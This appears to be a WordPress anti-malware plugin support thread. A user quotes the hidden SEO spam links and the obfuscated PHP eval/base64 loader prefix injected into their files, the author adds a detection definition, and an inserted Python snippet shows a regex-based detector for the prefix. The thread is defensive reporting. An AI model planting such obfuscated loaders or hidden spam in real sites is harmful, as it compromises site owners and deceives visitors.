Support » Plugin: Anti-Malware Security and Brute-Force Firewall » SEO Spam – MW:SPAM:SEO?v011 Issue

  • Resolved shumail

    (@shumail)



    Hi,

    First of all, I would like to thank you for a really nice plugin. My website got infected with malware, and when I scanned it with Sucuri, it showed that it’s infected with SEO spam. The results of the scan can be viewed here:
    http://sitecheck.sucuri.net/results/www.7diagonals.com

    When I scanned with the plugin, I found a file named ‘file_upload_include.php’ in the wp-content directory, which the plugin identified as a backdoor script, and it was indeed so. Though it automatically fixed it and I deleted it, the SEO spam is still here, and scanning the site doesn’t identify this malicious spam even though the plugin’s definitions are up to date.

    Can you please look into this and see why it’s not detecting ‘MW:SPAM:SEO?v011’? Thanks a lot in advance 🙂

    The payload of infected code is:

    <html>
    <div style='left: -3565px; position: absolute; top: -4812px'>
    <a href="http://www.thenorthface.us.com">The North Face</a>
    <a href="http://www.louisvuittonoutletonline.us.com">Louis Vuitton Outlet Online</a>
    <a href="http://www.cheapuggboot.us.com">Cheap UGGs</a>
    <a href="http://www.newbalanceoutlet.us.com">New Balance Outlet</a>
    <a href="http://www.michaelkorsoutletsonlineco.us.com">Michael Kors Outlet Online</a>
    <a href="http://www.hermesbirkin.us.com">Hermes Birkin</a>
    <a href="http://www.cheapoakley.us.com">Cheap Oakley Sunglasses</a>
    <a href="http://www.northfaceoutlets.us.com">The North Face Outlet</a> 
    
    </div>

    https://wordpress.org/plugins/gotmls/

  • Plugin Author Eli

    (@scheeeli)

    It looks like you already got rid of it. Sucuri actually caches their scan results so after you click “Force a Re-scan” to clear the cache Sucuri shows the site is clean.

    Let me know if there’s anything else.

    Aloha, Eli

    Yeah, it’s clean now.

    The backdoor was that ‘file_upload_include.php’ in wp-content and I removed it, but somehow it infected a lot of files, including theme files and many plugin files, and added malicious code. That SEO spam was because of that payload, which happened to be in footer.php, and I removed it from there, upon which Sucuri now shows that the site is clean. But I still have about 24 files infected.

    Here’s the code that the malware added at the start of those files. Maybe you can update the plugin definitions to tackle this and identify it if this issue happens to someone else:

    <?php /*versio:3.02*/ $GLOBALS["hqzafh"]="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"; if (!function_exists('yfruejew')){function yfruejew($a, $b){$c=$GLOBALS['hqzafh'];$d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};eval(yfruejew(553,3272));};?>

    Going to remove this from all those 24 files manually now. Thank you very much for your support and prompt response, and great plugin.
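
The prefix quoted in the post above has a fixed shape, and its `pack('H*', ...)` call hides a function name as concatenated hex strings. The following is an added example, not part of the thread and not the plugin's own code: a Python check that flags PHP files starting with that prefix and decodes the hidden name. The function names and `SAMPLE` are constructed for illustration, and the real blob is replaced by a placeholder.

```python
from __future__ import annotations
import re
from pathlib import Path

# Shape of the prefix quoted in the thread: "<?php /*versio:N.NN*/", a $GLOBALS
# blob, then eval() of a decoded slice of that blob, then the closing "?>".
INJECT_RE = re.compile(
    rb"^\s*<\?php\s*/\*versio:[\d.]+\*/\s*\$GLOBALS\[.*?"
    rb"eval\(\w+\(\d+,\s*\d+\)\);\s*\};?\s*\?>", re.DOTALL)
# pack('H*', 'hex'.'hex'...) spells a function name as concatenated hex strings.
PACK_RE = re.compile(rb"pack\(\s*'H\*'\s*,\s*((?:'[0-9a-fA-F]*'\s*\.?\s*)+)\)")

def decode_pack_names(data: bytes) -> list[str]:
    """Return the strings hidden in pack('H*', ...) calls."""
    names = []
    for m in PACK_RE.finditer(data):
        hex_digits = b"".join(re.findall(rb"'([0-9a-fA-F]*)'", m.group(1)))
        names.append(bytes.fromhex(hex_digits.decode()).decode("latin-1"))
    return names

def inspect(data: bytes) -> dict | None:
    """Describe the injected prefix at the start of a PHP file, if present."""
    m = INJECT_RE.match(data)
    if not m:
        return None
    return {"length": m.end(),
            "hidden_calls": decode_pack_names(m.group(0)),
            "remainder": data[m.end():]}  # original file content after the prefix

def scan_tree(root: str) -> dict[str, dict]:
    """Check every .php file under root (for example a copy of wp-content)."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        report = inspect(path.read_bytes())
        if report:
            hits[str(path)] = report
    return hits

# Constructed sample: the thread's prefix with a placeholder instead of the
# real blob, followed by a harmless theme footer line.
SAMPLE = (
    b'<?php /*versio:3.02*/ $GLOBALS["hqzafh"]="PLACEHOLDER"; '
    b"if (!function_exists('yfruejew')){function yfruejew($a, $b)"
    b"{$c=$GLOBALS['hqzafh'];$d=pack('H*','626173'.'6536345f6465636f6465'); "
    b"return $d(substr($c, $a, $b));};eval(yfruejew(553,3272));};?>"
    b"<?php wp_footer(); ?>")

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

`remainder` is what the file would contain with the prefix stripped; compare it against a known-good copy of the theme or plugin file before writing anything back.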

    Plugin Author Eli

    (@scheeeli)

    Thanks! I just added this new threat to the Definition Update. Please download the new update and let me know if you find any more.

    Aloha, Eli

    Updated the definitions, worked perfectly. Glad to contribute. Will share more if I find any. Thank you very much once again for the awesome work 🙂

    I had the same problem. Today I fixed it successfully with Anti-Malware and Brute-Force Security by ELI. Thank you very much!
